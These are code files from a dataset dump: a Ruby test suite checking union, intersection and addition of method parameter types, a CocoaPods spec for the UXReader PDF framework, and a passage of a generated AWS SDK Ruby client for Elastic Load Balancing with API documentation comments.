3829ba6c8353a94d5f415a6489fd1b7e383b1014 | 21,687 | require_relative "test_helper"
class InterfaceTest < Minitest::Test
include TestHelper
include FactoryHelper
def method_params(source)
parse_method_type(source).type.params
end
def test_method_type_params_plus
with_factory do
assert_equal method_params("(String | Integer) -> untyped"),
method_params("(String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer | nil) -> untyped"),
method_params("(String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(?String | Integer | nil, *Integer) -> untyped"),
method_params("(String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(?String | nil) -> untyped"),
method_params("(String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?String | Integer | nil) -> untyped"),
method_params("(?String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(?String | Integer, *Integer) -> untyped"),
method_params("(?String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(?String) -> untyped"),
method_params("(?String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?String | Integer | nil, *String) -> untyped"),
method_params("(*String) -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(*String | Integer) -> untyped"),
method_params("(*String) -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("(*String) -> untyped"),
method_params("(*String) -> untyped") + method_params("() -> untyped")
assert_equal method_params("(?Integer?) -> untyped"),
method_params("() -> untyped") + method_params("(Integer) -> untyped")
assert_equal method_params("(?Integer) -> untyped"),
method_params("() -> untyped") + method_params("(?Integer) -> untyped")
assert_equal method_params("(*Integer) -> untyped"),
method_params("() -> untyped") + method_params("(*Integer) -> untyped")
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") + method_params("() -> untyped")
assert_equal method_params("(foo: String | Integer) -> void"),
method_params("(foo: String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer | nil) -> void"),
method_params("(foo: String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer | nil, **Integer) -> void"),
method_params("(foo: String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(?foo: String?) -> void"),
method_params("(foo: String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: String | Integer | nil) -> void"),
method_params("(?foo: String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer) -> void"),
method_params("(?foo: String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(?foo: String | Integer, **Integer) -> void"),
method_params("(?foo: String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(?foo: String) -> void"),
method_params("(?foo: String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: Integer | String | nil, **String) -> void"),
method_params("(**String) -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: Integer | String, **String) -> void"),
method_params("(**String) -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(**String | Integer) -> void"),
method_params("(**String) -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("(**String) -> void"),
method_params("(**String) -> void") + method_params("() -> untyped")
assert_equal method_params("(?foo: Integer?) -> void"),
method_params("() -> void") + method_params("(foo: Integer) -> untyped")
assert_equal method_params("(?foo: Integer) -> void"),
method_params("() -> void") + method_params("(?foo: Integer) -> untyped")
assert_equal method_params("(**Integer) -> void"),
method_params("() -> void") + method_params("(**Integer) -> untyped")
assert_equal method_params("() -> void"),
method_params("() -> void") + method_params("() -> untyped")
end
end
def test_method_type_params_intersection
with_factory do
# req, none, opt, rest
# required:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(Integer) -> untyped")
# required:none
assert_nil method_params("(String) -> untyped") & method_params("() -> untyped")
# required:optional
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(?Integer) -> untyped")
# required:rest
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(String) -> untyped") & method_params("(*Integer) -> untyped")
# none:required
assert_nil method_params("() -> untyped") & method_params("(String) -> void")
# none:optional
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(?Integer) -> untyped")
# none:rest
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(*Integer) -> untyped")
# opt:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(Integer) -> untyped")
# opt:none
assert_equal method_params("() -> untyped"),
method_params("(?String) -> untyped") & method_params("() -> untyped")
# opt:opt
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(?Integer) -> untyped")
# opt:rest
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(?String) -> untyped") & method_params("(*Integer) -> untyped")
# rest:required
assert_equal method_params("(String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(Integer) -> untyped")
# rest:none
assert_equal method_params("() -> untyped"),
method_params("(*String) -> untyped") & method_params("() -> untyped")
# rest:opt
assert_equal method_params("(?String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(?Integer) -> untyped")
# rest:rest
assert_equal method_params("(*String & Integer) -> untyped"),
method_params("(*String) -> untyped") & method_params("(*Integer) -> untyped")
## Keywords
# req:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(foo: Integer) -> untyped")
# req:opt
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# req:none
assert_nil method_params("(foo: String) -> untyped") & method_params("() -> untyped")
# req:rest
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(foo: String) -> untyped") & method_params("(**Integer) -> untyped")
# opt:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(foo: Integer) -> untyped")
# opt:opt
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# opt:none
assert_equal method_params("() -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("() -> untyped")
# opt:rest
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(?foo: String) -> untyped") & method_params("(**Integer) -> untyped")
# none:req
assert_nil method_params("() -> untyped") & method_params("(foo: String) -> untyped")
# none:opt
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(?foo: Integer) -> untyped")
# none:rest
assert_equal method_params("() -> untyped"),
method_params("() -> untyped") & method_params("(**Integer) -> untyped")
# rest:req
assert_equal method_params("(foo: String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(foo: Integer) -> untyped")
# rest:opt
assert_equal method_params("(?foo: String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(?foo: Integer) -> untyped")
# rest:none
assert_equal method_params("() -> untyped"),
method_params("(**String) -> untyped") & method_params("() -> untyped")
# rest:rest
assert_equal method_params("(**String & Integer) -> untyped"),
method_params("(**String) -> untyped") & method_params("(**Integer) -> untyped")
end
end
def test_method_type_params_union
with_factory do
# required:required
assert_equal method_params("(String | Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(Integer) -> untyped")
# required:none
assert_equal method_params("(?String) -> void"),
method_params("(String) -> untyped") | method_params("() -> untyped")
# required:optional
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(?Integer) -> untyped")
# required:rest
assert_equal method_params("(?String | Integer, *Integer) -> untyped"),
method_params("(String) -> untyped") | method_params("(*Integer) -> untyped")
# none:required
assert_equal method_params("(?String) -> untyped"),
method_params("() -> untyped") | method_params("(String) -> untyped")
# none:optional
assert_equal method_params("(?Integer) -> untyped"),
method_params("() -> untyped") | method_params("(?Integer) -> untyped")
# none:rest
assert_equal method_params("(*Integer) -> untyped"),
method_params("() -> untyped") | method_params("(*Integer) -> untyped")
# opt:required
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(Integer) -> untyped")
# opt:none
assert_equal method_params("(?String) -> untyped"),
method_params("(?String) -> untyped") | method_params("() -> untyped")
# opt:opt
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(?Integer) -> untyped")
# opt:rest
assert_equal method_params("(?String | Integer) -> untyped"),
method_params("(?String) -> untyped") | method_params("(*Integer) -> untyped")
# rest:required
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") | method_params("(Integer) -> untyped")
# rest:none
assert_equal method_params("(*String) -> untyped"),
method_params("(*String) -> untyped") | method_params("() -> untyped")
# rest:opt
assert_equal method_params("(?String | Integer, *String) -> untyped"),
method_params("(*String) -> untyped") | method_params("(?Integer) -> untyped")
# rest:rest
assert_equal method_params("(*String | Integer) -> untyped"),
method_params("(*String) -> untyped") | method_params("(*Integer) -> untyped")
## Keywords
# req:req
assert_equal method_params("(foo: String | Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(foo: Integer) -> untyped")
# req:opt
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# req:none
assert_equal method_params("(?foo: String) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("() -> untyped")
# req:rest
assert_equal method_params("(?foo: String | Integer, **Integer) -> untyped"),
method_params("(foo: String) -> untyped") | method_params("(**Integer) -> untyped")
# opt:req
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(foo: Integer) -> untyped")
# opt:opt
assert_equal method_params("(?foo: String | Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# opt:none
assert_equal method_params("(?foo: String) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("() -> untyped")
# opt:rest
assert_equal method_params("(?foo: String | Integer, **Integer) -> untyped"),
method_params("(?foo: String) -> untyped") | method_params("(**Integer) -> untyped")
# none:req
assert_equal method_params("(?foo: String) -> untyped"),
method_params("() -> untyped") | method_params("(foo: String) -> untyped")
# none:opt
assert_equal method_params("(?foo: Integer) -> untyped"),
method_params("() -> untyped") | method_params("(?foo: Integer) -> untyped")
# none:rest
assert_equal method_params("(**Integer) -> untyped"),
method_params("() -> untyped") | method_params("(**Integer) -> untyped")
# rest:req
assert_equal method_params("(?foo: String | Integer, **String) -> untyped"),
method_params("(**String) -> untyped") | method_params("(foo: Integer) -> untyped")
# rest:opt
assert_equal method_params("(?foo: String | Integer, **String) -> untyped"),
method_params("(**String) -> untyped") | method_params("(?foo: Integer) -> untyped")
# rest:none
assert_equal method_params("(**String) -> untyped"),
method_params("(**String) -> untyped") | method_params("() -> untyped")
# rest:rest
assert_equal method_params("(**String | Integer) -> untyped"),
method_params("(**String) -> untyped") | method_params("(**Integer) -> untyped")
end
end
def test_method_type_union
with_factory do
assert_equal parse_method_type("(String & Integer) -> (String | Symbol)"),
parse_method_type("(String) -> String") | parse_method_type("(Integer) -> Symbol")
assert_nil parse_method_type("() -> String") | parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("() -> bool"),
parse_method_type("() -> bot") | parse_method_type("() -> bool")
assert_equal parse_method_type("() -> untyped"),
parse_method_type("() -> untyped") | parse_method_type("() -> String")
assert_equal parse_method_type("() { (String | Integer) -> (Integer & Float) } -> (String | Symbol)"),
parse_method_type("() { (String) -> Integer } -> String") | parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_equal parse_method_type("() { (String | Integer, ?String) -> void } -> void"),
parse_method_type("() { (String, String) -> void } -> void") | parse_method_type("() { (Integer) -> void } -> void")
assert_equal parse_method_type("() { (String | Integer) -> (Integer & Float) } -> (String | Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") | parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_equal parse_method_type("() ?{ (String) -> Integer } -> (String | Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") | parse_method_type("() -> Symbol")
end
end
def test_method_type_union_poly
with_factory do
assert_method_type(
"[A, A(n), B(m)] ((Array[A] & Hash[A(n), B(m)])) -> (String | Symbol)",
parse_method_type("[A] (Array[A]) -> String") | parse_method_type("[A, B] (Hash[A, B]) -> Symbol")
)
end
end
def test_method_type_intersection
with_factory do
assert_equal parse_method_type("(String | Integer) -> (String & Symbol)"),
parse_method_type("(String) -> String") & parse_method_type("(Integer) -> Symbol")
assert_equal parse_method_type("(?Integer) -> untyped"),
parse_method_type("() -> String") & parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("() -> bot"),
parse_method_type("() -> bot") & parse_method_type("() -> bool")
assert_equal parse_method_type("() -> untyped"),
parse_method_type("() -> untyped") & parse_method_type("() -> String")
assert_equal parse_method_type("() { (String & Integer) -> (Integer | Float) } -> (String & Symbol)"),
parse_method_type("() { (String) -> Integer } -> String") & parse_method_type("() { (Integer) -> Float } -> Symbol")
assert_nil parse_method_type("() { (String, String) -> void } -> void") & parse_method_type("() { (Integer) -> void } -> void")
assert_equal parse_method_type("() ?{ (String & Integer) -> (Integer | Float) } -> (String & Symbol)"),
parse_method_type("() ?{ (String) -> Integer } -> String") & parse_method_type("() { (Integer) -> Float } -> Symbol")
end
end
def test_method_type_intersection_poly
with_factory do
assert_method_type(
"[A, A(i) < Array[Integer]] ((A | A(i))) -> (A & Integer)",
parse_method_type("[A] (A) -> A") & parse_method_type("[A < Array[Integer]] (A) -> Integer")
)
end
end
def test_method_type_plus
with_factory do |factory|
assert_equal parse_method_type("(String | Integer) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("(?String | Integer | nil) -> untyped"),
parse_method_type("(?String) -> untyped") + parse_method_type("(Integer) -> untyped")
assert_equal parse_method_type("(?String | nil) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("() -> untyped")
assert_equal parse_method_type("(?String | Symbol | nil, *Symbol) -> untyped"),
parse_method_type("(String) -> untyped") + parse_method_type("(*Symbol) -> untyped")
assert_equal parse_method_type("(?String | Symbol | nil, *Symbol) -> (Array | Hash)"),
parse_method_type("(String) -> Hash") + parse_method_type("(*Symbol) -> Array")
assert_equal parse_method_type("(name: String | Symbol, ?email: String | Array | nil, ?age: Integer | Object | nil, **Array | Object) -> void"),
parse_method_type("(name: String, email: String, **Object) -> void") + parse_method_type("(name: Symbol, age: Integer, **Array) -> void")
assert_equal parse_method_type("() ?{ (String | Integer) -> (Array | Hash) } -> void"),
parse_method_type("() ?{ (String) -> Array } -> void") + parse_method_type("() { (Integer) -> Hash } -> void")
end
end
def test_method_type_params_poly
with_factory do |factory|
assert_method_type(
"[A(n)] () ?{ (String) -> A(n) } -> (String | A(n))",
parse_method_type("() -> String") + parse_method_type("[A] { (String) -> A } -> A")
)
end
end
end
| 46.941558 | 156 | 0.575829 |
f8e9797c3dd33325eb190b7684bbbd5f7ae97346 | 540 | Pod::Spec.new do |s|
s.name = 'UXReader'
s.version = '0.1.1'
s.platform = :ios, '8.0'
s.summary = 'UXReader PDF Framework for iOS'
s.homepage = 'https://github.com/muyexi/UXReader-iOS'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'muyexi' => '[email protected]' }
s.source = { :git => 'https://github.com/muyexi/UXReader-iOS.git', :tag => s.version.to_s }
s.vendored_frameworks = 'UXReader.framework'
s.requires_arc = true
end
| 41.538462 | 103 | 0.544444 |
f885863fb523d9b5c7e70b6c50429063894f2761 | 105,291 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/query.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:elasticloadbalancing)
module Aws::ElasticLoadBalancing
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :elasticloadbalancing
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::Query)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::SharedCredentials` - Used for loading credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2 IMDS instance profile - When used by default, the timeouts are
# very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` to enable retries and extended
# timeouts.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is search for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test endpoints. This should be avalid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available. Defaults to `false`.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function. Some predefined functions can be referenced by name - :none, :equal, :full, otherwise a Proc that takes and returns a number.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors and auth
# errors from expired credentials.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit) used by the default backoff function.
#
# @option options [String] :secret_access_key
#
# @option options [String] :session_token
#
# @option options [Boolean] :stub_responses (false)
# Causes the client to return stubbed responses. By default
# fake responses are generated and returned. You can specify
# the response data to return or errors to raise by calling
# {ClientStubs#stub_responses}. See {ClientStubs} for more information.
#
# ** Please note ** When response stubbing is enabled, no HTTP
# requests are made, and retries are disabled.
#
# @option options [Boolean] :validate_params (true)
# When `true`, request parameters are validated before
# sending the request.
#
# @option options [URI::HTTP,String] :http_proxy A proxy to send
# requests through. Formatted like 'http://proxy.com:123'.
#
# @option options [Float] :http_open_timeout (15) The number of
# seconds to wait when opening a HTTP session before rasing a
# `Timeout::Error`.
#
# @option options [Integer] :http_read_timeout (60) The default
# number of seconds to wait for response data. This value can
# safely be set
# per-request on the session yeidled by {#session_for}.
#
# @option options [Float] :http_idle_timeout (5) The number of
# seconds a connection is allowed to sit idble before it is
# considered stale. Stale connections are closed and removed
# from the pool before making a request.
#
# @option options [Float] :http_continue_timeout (1) The number of
# seconds to wait for a 100-continue response before sending the
# request body. This option has no effect unless the request has
# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
# request on the session yeidled by {#session_for}.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
# `:ssl_ca_bundle` or `:ssl_ca_directory` the the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
# not pass `:ssl_ca_bundle` or `:ssl_ca_directory` the the
# system default will be used if available.
#
def initialize(*args)
super
end
# @!group API Operations
# Adds the specified tags to the specified load balancer. Each load
# balancer can have a maximum of 10 tags.
#
# Each tag consists of a key and an optional value. If a tag with the
# same key is already associated with the load balancer, `AddTags`
# updates its value.
#
# For more information, see [Tag Your Classic Load Balancer][1] in the
# *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/add-remove-tags.html
#
# @option params [required, Array<String>] :load_balancer_names
# The name of the load balancer. You can specify one load balancer only.
#
# @option params [required, Array<Types::Tag>] :tags
# The tags.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To add tags to a load balancer
#
# # This example adds two tags to the specified load balancer.
#
# resp = client.add_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# tags: [
# {
# key: "project",
# value: "lima",
# },
# {
# key: "department",
# value: "digital-media",
# },
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.add_tags({
# load_balancer_names: ["AccessPointName"], # required
# tags: [ # required
# {
# key: "TagKey", # required
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/AddTags AWS API Documentation
#
# @overload add_tags(params = {})
# @param [Hash] params ({})
def add_tags(params = {}, options = {})
req = build_request(:add_tags, params)
req.send_request(options)
end
# Associates one or more security groups with your load balancer in a
# virtual private cloud (VPC). The specified security groups override
# the previously associated security groups.
#
# For more information, see [Security Groups for Load Balancers in a
# VPC][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-security-groups.html#elb-vpc-security-groups
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :security_groups
# The IDs of the security groups to associate with the load balancer.
# Note that you cannot specify the name of the security group.
#
# @return [Types::ApplySecurityGroupsToLoadBalancerOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ApplySecurityGroupsToLoadBalancerOutput#security_groups #security_groups} => Array<String>
#
#
# @example Example: To associate a security group with a load balancer in a VPC
#
# # This example associates a security group with the specified load balancer in a VPC.
#
# resp = client.apply_security_groups_to_load_balancer({
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-fc448899",
# ],
# })
#
# resp.to_h outputs the following:
# {
# security_groups: [
# "sg-fc448899",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.apply_security_groups_to_load_balancer({
# load_balancer_name: "AccessPointName", # required
# security_groups: ["SecurityGroupId"], # required
# })
#
# @example Response structure
#
# resp.security_groups #=> Array
# resp.security_groups[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ApplySecurityGroupsToLoadBalancer AWS API Documentation
#
# @overload apply_security_groups_to_load_balancer(params = {})
# @param [Hash] params ({})
def apply_security_groups_to_load_balancer(params = {}, options = {})
req = build_request(:apply_security_groups_to_load_balancer, params)
req.send_request(options)
end
# Adds one or more subnets to the set of configured subnets for the
# specified load balancer.
#
# The load balancer evenly distributes requests across all registered
# subnets. For more information, see [Add or Remove Subnets for Your
# Load Balancer in a VPC][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-manage-subnets.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :subnets
# The IDs of the subnets to add. You can add only one subnet per
# Availability Zone.
#
# @return [Types::AttachLoadBalancerToSubnetsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AttachLoadBalancerToSubnetsOutput#subnets #subnets} => Array<String>
#
#
# @example Example: To attach subnets to a load balancer
#
# # This example adds the specified subnet to the set of configured subnets for the specified load balancer.
#
# resp = client.attach_load_balancer_to_subnets({
# load_balancer_name: "my-load-balancer",
# subnets: [
# "subnet-0ecac448",
# ],
# })
#
# resp.to_h outputs the following:
# {
# subnets: [
# "subnet-15aaab61",
# "subnet-0ecac448",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.attach_load_balancer_to_subnets({
# load_balancer_name: "AccessPointName", # required
# subnets: ["SubnetId"], # required
# })
#
# @example Response structure
#
# resp.subnets #=> Array
# resp.subnets[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/AttachLoadBalancerToSubnets AWS API Documentation
#
# @overload attach_load_balancer_to_subnets(params = {})
# @param [Hash] params ({})
def attach_load_balancer_to_subnets(params = {}, options = {})
req = build_request(:attach_load_balancer_to_subnets, params)
req.send_request(options)
end
# Specifies the health check settings to use when evaluating the health
# state of your EC2 instances.
#
# For more information, see [Configure Health Checks for Your Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-healthchecks.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Types::HealthCheck] :health_check
# The configuration information.
#
# @return [Types::ConfigureHealthCheckOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ConfigureHealthCheckOutput#health_check #health_check} => Types::HealthCheck
#
#
# @example Example: To specify the health check settings for your backend EC2 instances
#
# # This example specifies the health check settings used to evaluate the health of your backend EC2 instances.
#
# resp = client.configure_health_check({
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
